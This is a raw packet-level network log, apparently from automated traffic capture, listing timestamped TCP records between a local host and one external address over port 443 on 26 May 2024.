May 26, 2024 00:17:17.605387926 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.605454922 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.605787039 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.605803967 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.612498045 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.612818003 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.614805937 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.615150928 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.631608009 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.631942987 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.632488966 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.632515907 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.633723974 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.634776115 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.634793043 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.652743101 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.652743101 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.652746916 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.652759075 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.652760983 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.652792931 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.657017946 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.657037973 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.657044888 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.657059908 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.657124996 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.664105892 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.664158106 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.664906025 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.665154934 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.665460110 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.665479898 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.667625904 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.667675018 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.667726994 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.668135881 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.669138908 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.669151068 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.669423103 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.669656038 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.669672966 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.669945002 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.669958115 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.670059919 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.706501007 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.706537962 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.710505009 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.710513115 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.714528084 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.721395969 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.752264977 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752289057 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752296925 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752351046 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.752357960 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752417088 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752429962 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.752443075 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.752456903 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.752485991 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.762995005 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.763063908 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.763082981 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.763115883 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.808027983 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.808048010 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.808809996 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.808892012 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.808969975 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.812262058 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.812294960 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.831867933 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.834888935 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.834913015 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.836369038 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.836429119 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.837016106 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.837099075 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.837236881 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.837243080 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.872126102 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.872150898 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.872210026 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.872253895 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.872360945 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.873292923 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.873307943 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.873668909 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.873686075 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.873788118 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.876748085 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.876771927 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.881849051 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.881871939 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.881884098 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.881934881 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.881978989 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.884434938 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.888534069 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.907063007 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.907089949 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.907316923 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.907330036 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.907475948 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.926040888 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.926058054 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.927263975 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.927304029 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.932256937 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.932442904 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.932507992 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.932528973 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.932655096 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.932655096 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.932671070 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.932961941 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.938741922 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.938744068 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.938762903 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.938770056 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.939374924 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.939388037 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.939438105 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.943269014 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.943280935 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.959112883 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.959127903 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987165928 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987234116 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987260103 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987278938 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987325907 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987344027 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987385035 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.987421036 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.987437963 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.987437963 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.988713980 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.998511076 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.998533010 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.998575926 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.998615980 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.998620987 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.998641014 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.998660088 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.998671055 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.003954887 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.003992081 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004002094 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004024029 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004035950 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004046917 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004069090 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.004081964 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.004112005 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.004494905 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.006684065 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006707907 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006716013 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006733894 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006741047 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006745100 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.006808043 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.006827116 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.008342981 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.010679007 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.010761023 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.010787010 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.014725924 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.014749050 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.014763117 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.015784979 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.015813112 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.015830040 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.015851974 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.015855074 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.015913010 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.016895056 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.034280062 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034349918 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034373045 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034415007 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034435987 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034456968 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034467936 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.034496069 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.034570932 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.034570932 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.042104006 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.042216063 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.042309999 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.042309999 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.042332888 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.042546988 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.042579889 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.045934916 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.045938015 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.101604939 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101640940 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101660013 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101703882 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101726055 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101742029 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.101753950 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.101759911 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101789951 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.101902962 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.101984978 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.110229015 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.139786005 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.139822960 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.139981031 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.145109892 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.145123959 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.186959028 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.186996937 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.187027931 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.187062025 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.187087059 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.187099934 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.187103033 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.187530994 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.196373940 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.196391106 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.201217890 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.201262951 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.201333046 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.203316927 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.203335047 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.206810951 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.206834078 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.206907988 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.207937002 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.207954884 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.209403038 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.209486008 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.210300922 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.210601091 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.210608006 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.211349010 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.211369991 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.211463928 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.212686062 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.212711096 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.216432095 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.216454983 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.218558073 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.218590021 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.219904900 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.219928980 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.368401051 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.368434906 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.385689974 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.386302948 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.386328936 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.386717081 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.387093067 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.387159109 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.387347937 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.406821966 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.430502892 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.434340954 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.434365988 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.434923887 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.435318947 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.435388088 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.479845047 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.483812094 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.520956993 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.521657944 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.521673918 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.522021055 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.525208950 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.525208950 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.525224924 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.525273085 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.526503086 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.575784922 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.599064112 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.599520922 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.599534988 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.600085020 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.601032019 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.601099014 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.601234913 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.642505884 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.651065111 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.663399935 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.663923979 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.663959026 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.667856932 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.667941093 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.671948910 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.675839901 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.676095009 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.676870108 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.676882982 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.677005053 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.677018881 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.677186966 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.679502964 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.679558992 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.679971933 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.721647024 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.721662998 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.721712112 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.722228050 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.722234011 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.722500086 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.836364031 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847788095 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847814083 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847820997 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847850084 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847862959 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847875118 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847923040 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.847950935 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.847987890 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.849591017 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.870049000 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.870074987 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.870186090 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.870219946 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.872562885 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.872617960 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.872626066 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.872634888 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.872682095 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.881140947 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.881160021 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.881167889 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.881201029 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.881210089 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.881223917 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.881236076 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.881261110 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.882198095 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.895468950 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920139074 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920308113 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920325994 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920367002 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.920372963 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920381069 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.920403004 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.920435905 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.924705029 CEST	443	49780	185.216.70.93	192.168.2.4
